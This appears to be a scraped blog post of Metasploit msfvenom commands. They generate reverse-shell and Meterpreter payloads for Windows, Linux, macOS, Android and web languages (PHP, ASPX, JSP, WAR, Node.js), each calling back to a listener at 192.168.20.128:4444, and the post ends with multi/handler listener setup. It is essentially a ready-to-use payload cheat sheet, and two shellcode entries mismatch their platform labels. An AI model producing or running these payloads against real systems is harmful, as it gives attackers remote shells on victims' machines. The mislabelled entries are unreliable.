当前位置:网站首页>MSF generate payload Encyclopedia
MSF generate payload Encyclopedia
2022-07-06 14:07:00 【Unknown white hat】
Catalog
resources
msf Generate payload Complete works of _ Unknown white hat blog -CSDN Blog
One 、payload
1.windwos
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe
2.liunx
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf
3.mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho
4.android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk
5.Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
6.shellcode(windwos)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c
7.shellcode(liunx)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c
8.shellcode(mac)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c
Two 、 rebound shell
1.python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
2.bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh
3.Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl
4.Lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua
5.Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb
6.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
7.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx
8.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp
9.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp
10.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war
11.nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js
3、 ... and 、 monitor
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.20.128
set LPORT 4444
show options # Leak filling
exploit
边栏推荐
- js判断对象是否是数组的几种方式
- HackMyvm靶机系列(2)-warrior
- 7-14 error ticket (PTA program design)
- 1. Preliminary exercises of C language (1)
- A complete collection of papers on text recognition
- Network layer - simple ARP disconnection
- "Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
- Experiment 8 exception handling
- [data processing of numpy and pytoch]
- 7-6 local minimum of matrix (PTA program design)
猜你喜欢
随机推荐
Using spacedesk to realize any device in the LAN as a computer expansion screen
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
How to understand the difference between technical thinking and business thinking in Bi?
Experiment 8 exception handling
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
Why use redis
Strengthen basic learning records
Hackmyvm target series (3) -visions
The difference between cookies and sessions
Experiment 6 inheritance and polymorphism
7-14 error ticket (PTA program design)
Attach the simplified sample database to the SQLSERVER database instance
记一次,修改密码逻辑漏洞实战
强化学习基础记录
WEB漏洞-文件操作之文件包含漏洞
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
7-15 h0161. 求最大公约数和最小公倍数(PTA程序设计)
实验七 常用类的使用(修正帖)
4. Branch statements and loop statements
js判断对象是否是数组的几种方式